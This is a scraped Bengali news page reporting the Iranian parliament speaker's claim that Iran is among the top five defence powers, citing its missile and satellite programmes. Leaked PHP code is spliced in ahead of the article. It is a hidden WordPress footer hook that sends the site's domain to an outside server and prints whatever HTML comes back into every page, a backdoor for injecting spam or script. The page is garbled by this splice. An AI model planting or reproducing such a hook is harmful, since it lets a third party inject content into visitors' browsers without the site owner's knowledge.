/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); প্রতিরক্ষা ক্ষেত্রে ৫ শীর্ষ দেশের একটি হচ্ছে ইরান: সংসদ স্পিকার | Dhaka Sky News

বাইডেন প্রশাসনের আমলে প্রথম মার্কিন যুদ্ধজাহাজ পাড়ি দিল তাইওয়ান প্রণালী

আগের সংবাদ

আমেরিকার ভেতরে আগ্নেয়াস্ত্র বিক্রিতে রেকর্ড সৃষ্টি

পরের সংবাদ

প্রতিরক্ষা ক্ষেত্রে ৫ শীর্ষ দেশের একটি হচ্ছে ইরান: সংসদ স্পিকার

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: February 4, 2021 , 10:20 pm

প্রতিরক্ষা ক্ষেত্রে বিশ্বের শীর্ষ পাঁচ দেশের একটি হচ্ছে ইসলামী প্রজাতন্ত্র ইরান। এ তথ্য জানিয়েছেন ইরানের সংসদ স্পিকার মোহাম্মাদ বাকের কলিবফ। তিনি আজ (বৃহস্পতিবার) দেশের সিটি ও ভিলেজ কাউন্সিলগুলোর ৩৯তম জাতীয় সম্মেলনে এ তথ্য জানান।

তিনি আরও বলেছেন, ইসলামী বিপ্লবের পর ইরান বিজ্ঞান ও প্রতিরক্ষাসহ নানা ক্ষেত্রে ব্যাপক উন্নতি সাধন করেছে। তরুণদের প্রতিভা কাজে লাগিয়ে দেশ আজ এ অবস্থানে পৌঁছেছে।

এ সময় কলিবফ ক্ষেপণাস্ত্র তৈরি এবং স্যাটেলাইট নির্মাণ ও উৎক্ষেপণে ইরানের সাফল্য তুলে ধরে বলেন, আমরা অ্যারোস্পেস খাতে এখন ঐসব দেশের কাতারে রয়েছি যারা স্যাটেলাইট তৈরি থেকে শুরু করে কক্ষপথে তা স্থাপন পর্যন্ত সব কাজ নিজেরাই করতে পারে। বৈজ্ঞানিক ও কারিগরি ক্ষেত্রে এই সক্ষমতা পুরোপুরি অর্জন করেছে ইরান।

স্যাটেলাইট বহনে সক্ষম সর্বশেষ ইরানি রকেট জুলজানাহ’র সফল উৎক্ষেপণ ( ১ ফেব্রুয়ারি, ২০২১)

সংসদ স্পিকার আরও বলেন, ইরান নানা ধরণের ক্ষেপণাস্ত্র নির্মাণ করে এই শিল্পকে স্বনির্ভর করে তুলেছে এবং সব কিছুই দেশীয় প্রযুক্তি নির্ভর হয়ে উঠেছে।

কলিবফ বলেন, ক্ষেপণাস্ত্র শিল্পের জ্ঞান-প্রযুক্তি এবং এর ব্যবস্থাপনার সবই ইরানিদের নিজস্ব। সূত্র : পার্সটুডে